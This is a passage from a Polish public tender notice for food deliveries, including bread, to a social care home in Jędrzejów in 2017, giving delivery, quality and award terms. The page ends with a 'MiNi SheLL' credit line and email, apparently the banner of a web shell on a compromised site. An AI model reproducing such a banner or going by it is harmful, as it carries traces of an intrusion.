14.	Podane ilości w formularzu cenowym stanowią wielkości szacunkowe. W przypadku zakupu przez Zamawiającego mniejszych ilości przedmiotu zamówienia Wykonawcy nie przysługują uprawnienia do dochodzenia jakichkolwiek roszczeń z tego tytułu. Zamawiający zastrzega sobie prawo dokonywania zmian ilości przedmiotu zamówienia w poszczególnych asortymentach stosownie do swoich potrzeb  a także do rezygnacji z niektórych pozycji.
15.	Wykonawca nie może bez zgody Zamawiającego dokonać zmiany rodzaju oferowanego produktu, który będzie objęty umową.
16.	Dostarczane produkty żywnościowe  w  zależności od ich kategorii muszą przy każdej   dostawie   posiadać  wszystkie   niezbędne  dokumenty  wymagane  przepisami  prawa   żywnościowego. 
17.	Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie przedmiotu zamówienia publicznego, w domyśle, wskazaniu takiemu każdorazowo towarzyszą wyrazy lub równoważny.  Zgodnie z art. 29 ust 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych i zastosowanie produktów równoważnych na cały asortyment stanowiący przedmiot zamówienia publicznego, tj. produktów innych producentów niż wymienione w SIWZ z zastrzeżeniem, by ich minimalne parametry jakościowe były co najmniej takie same jak parametry i cechy produktów wskazanych w opisie przedmiotu zamówienia publicznego.  Produkty równoważne mają mieć te same walory organoleptyczne - smak, zapach, barwę, estetykę, konsystencję.W przypadku zaoferowania asortymentu równoważnego, Wykonawca jest zobowiązany wykazać, że oferowany przez niego produkt spełnia wymagania określone przez Zamawiającego. Na potwierdzenie spełniania wymagań, Wykonawca przedłoży na żądanie Zamawiającego specyfikację produktu równoważnego oferowanego przez Wykonawcę, która ma zawierać wyszczególnione cechy charakterystyczne, potwierdzające zgodność oferowanego asortymentu z asortymentem opisanym przez Zamawiającego  (skład, wagę, gramaturę itp.). 
18.	UWAGA: Jeżeli zaoferowane artykuły będą posiadały parametry gorsze od wymaganych  w opisie przedmiotu zamówienia publicznego , Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt  2 ustawy prawo zamówień publicznych. Ciężar udowodnienia, że zaoferowane przez Wykonawcę artykuły odpowiadają wymaganiom wskazanym przez Zamawiającego, spoczywa na Wykonawcy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03100000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>30</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Pieczywo<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	   Przedmiot zamówienia stanowią sukcesywne dostawy artykułów spożywczych  dla Domu Pomocy Społecznej w Jędrzejowie w roku 2017 zgodnie  z  warunkami  wynikającymi z obowiązujących przepisów, w szczególności rozporządzenia   (WE) nr 852/2004    Parlamentu     Europejskiego i  Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. Urz. UE L139 z dnia 30.04.2004r.),  rozporządzenia   (WE)    nr 853/2004   Parlamentu   Europejskiego i Rady z dnia 29 kwietnia  2004 r.   ustanawiającym   szczególne    przepisy    dotyczące    higieny w  odniesieniu   do  żywności   pochodzenia    zwierzęcego   (Dz. Urz. UE L 139 z 30.04.2004) oraz ustawy z dnia 25 sierpnia 2006 r. o  bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594)  
2.	 	Przedmiot zamówienia podzielony został odpowiednio na 4  części, zgodnie z załącznikami nr 1A  1D   które stanowią załączniki do oferty i integralną część SIWZ.
3.	  Dopuszcza się składanie ofert częściowych. Wykonawca może złożyć w postępowaniu wyłącznie jedną ofertę na jedną lub kilka części zamówienia.
4.	  Przez sukcesywną dostawę należy rozumieć cykliczną sprzedaż i dostawę artykułów spożywczych na podstawie zamówień dostosowanych do aktualnych potrzeb, składanych pisemnie (faksem, drogą elektroniczną)  przez pracownika DPS.
5.	  Wykonawca zobowiązany będzie dostarczyć zamówione produkty na własny koszt i ryzyko w miejsce wskazane przez Zamawiającego. W szczególności Wykonawca zobowiązany będzie zapewnić dostawę, rozładunek  i wniesienie dostarczonego asortymentu do pomieszczeń wskazanych przez pracownika Zamawiającego.
6.	   Odbiór artykułów spożywczych odbywać się będzie w siedzibie Zamawiającego po każdorazowym stwierdzeniu zgodności z zamówieniem, jakością i po podpisaniu przez obie strony dokumentu odbioru dostawy.
7.	   Produkty dostarczane nie mogą stwarzać żadnego niebezpieczeństwa zagrożenia zdrowia i życia mieszkańców Zamawiającego. Jeżeli zostaną ujawnione jakiekolwiek niebezpieczeństwa związane z uszkodzeniem produktu lub stwierdzeniem złej daty ważności do spożycia, stwierdzeniem cech popsucia produktu lub cech braku świeżości, Zamawiający wycofa produkt z dostawy a Wykonawca winien wadliwą partię wymienić na tożsame produkty wolne od wad na własny koszt. 
8.	  Zamawiający sprawdzi przedmiot zamówienia przy każdej dostawie i w razie stwierdzenia nieprawidłowości, zakwestionowania jakości towaru, nastąpi wymiana towaru na towar dobrej jakości w tym samym dniu. 
9.	  W przypadku braków asortymentowych Wykonawca niezwłocznie uzupełni brakujący towar.
10.	Wykonawca zapewnia, że dostarczane artykuły żywnościowe będą należytej jakości oraz że będą dostarczane w oryginalnych i nienaruszonych opakowaniach, nie później niż w połowie okresu przydatności do spożycia przewidzianego dla danego artykułu spożywczego. 
11.	Dostarczane produkty winny posiadać długi termin przydatności do spożycia zapewniający bezpieczne zużycie dostarczonych produktów a oznaczenie terminu ważności musi być czytelne. 
12.	Opakowania transportowe winny być nie naruszone.
13.	Zamawiający zastrzega sobie prawo niezrealizowania przedmiotu zamówienia w pełnej ilości artykułów określonych w formularzu cenowym.
14.	Podane ilości w formularzu cenowym stanowią wielkości szacunkowe. W przypadku zakupu przez Zamawiającego mniejszych ilości przedmiotu zamówienia Wykonawcy nie przysługują uprawnienia do dochodzenia jakichkolwiek roszczeń z tego tytułu. Zamawiający zastrzega sobie prawo dokonywania zmian ilości przedmiotu zamówienia w poszczególnych asortymentach stosownie do swoich potrzeb  a także do rezygnacji z niektórych pozycji.
15.	Wykonawca nie może bez zgody Zamawiającego dokonać zmiany rodzaju oferowanego produktu, który będzie objęty umową.
16.	Dostarczane produkty żywnościowe  w  zależności od ich kategorii muszą przy każdej   dostawie   posiadać  wszystkie   niezbędne  dokumenty  wymagane  przepisami  prawa   żywnościowego. 
17.	Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie przedmiotu zamówienia publicznego, w domyśle, wskazaniu takiemu każdorazowo towarzyszą wyrazy lub równoważny.  Zgodnie z art. 29 ust 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza składanie ofert równoważnych i zastosowanie produktów równoważnych na cały asortyment stanowiący przedmiot zamówienia publicznego, tj. produktów innych producentów niż wymienione w SIWZ z zastrzeżeniem, by ich minimalne parametry jakościowe były co najmniej takie same jak parametry i cechy produktów wskazanych w opisie przedmiotu zamówienia publicznego.  Produkty równoważne mają mieć te same walory organoleptyczne - smak, zapach, barwę, estetykę, konsystencję.W przypadku zaoferowania asortymentu równoważnego, Wykonawca jest zobowiązany wykazać, że oferowany przez niego produkt spełnia wymagania określone przez Zamawiającego. Na potwierdzenie spełniania wymagań, Wykonawca przedłoży na żądanie Zamawiającego specyfikację produktu równoważnego oferowanego przez Wykonawcę, która ma zawierać wyszczególnione cechy charakterystyczne, potwierdzające zgodność oferowanego asortymentu z asortymentem opisanym przez Zamawiającego  (skład, wagę, gramaturę itp.). 
18.	UWAGA: Jeżeli zaoferowane artykuły będą posiadały parametry gorsze od wymaganych  w opisie przedmiotu zamówienia publicznego , Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt  2 ustawy prawo zamówień publicznych. Ciężar udowodnienia, że zaoferowane przez Wykonawcę artykuły odpowiadają wymaganiom wskazanym przez Zamawiającego, spoczywa na Wykonawcy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15851000-8, 15613000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>30</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com